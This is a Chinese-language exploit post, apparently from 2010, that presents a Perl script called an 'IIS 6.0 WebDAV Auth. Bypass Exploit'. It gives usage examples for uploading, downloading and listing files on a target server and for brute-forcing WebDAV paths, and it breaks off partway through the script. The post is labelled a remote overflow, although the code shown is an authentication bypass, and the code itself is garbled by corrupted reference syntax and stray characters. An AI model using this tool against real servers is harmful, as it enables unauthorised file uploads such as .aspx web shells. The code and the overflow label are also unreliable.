IIS 6.0 远程溢出漏洞

Oday摘要： 发布日期：2010-10.03发布作者：FoXHaCkEr影响版本：IIS6.0官方地址：Microsoft漏洞类型：远程溢出漏洞描述：微软IIS6.0一个远程溢出漏洞代码exp:#!/usr/bin/perl#*********!!!WARNING!!!*********#*FORSECURITYTESTiNGONLY!*#***********************************#

 

发布日期：2010-10.03
发布作者：FoX HaCkEr

影响版本：IIS 6.0
官方地址：Microsoft

漏洞类型：远程溢出

漏洞描述：微软IIS 6.0 一个远程溢出漏洞代码

exp: #!/usr/bin/perl
# ********* !!! WARNING !!! *********
# * FOR SECURITY TESTiNG ONLY! *
# ***********************************
# MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
# v1.1 add brute force dir fuction.
# v1.0 download?upload and list dir.
#
# Usage:
# IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
# -target &nbs p; eg.: 192.168.1.1
# -port eg.: 80
# -method eg.: g
# (p:PUT,g:GET,l:LIST)
# -webdavpath eg.: webdav
# -BruteForcePath eg.: brute force webdav path
# -file (optional) eg.: test.aspx
# Example:
# put a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
# get a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
# list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
# brute force + list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
# brute force + get file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx

use IO::Socket;use Getopt::Long;

use threads;
use threads::shared;

# Globals Go Here.
my $target; # Host being probed.
my $port; # Webserver port.
my $method; # HTTP Method, PUT GET or .
my $xpath; # WebDAV path on Webserver.
my $bpath; # Bruteforce WebDAV path.
my $file; # file name.
my $httpmethod;
my $Host_Header; # The Host header has to be changed

GetOptions(
"target=s" ; => /$target,
"port=i" => /$port,
"method=s" => /$method,
"xpath=s" => /$xpath,
"bpath=s" => /$bpath,
"file=s" => /$file,
"help|?" => sub {
hello();
exit(0);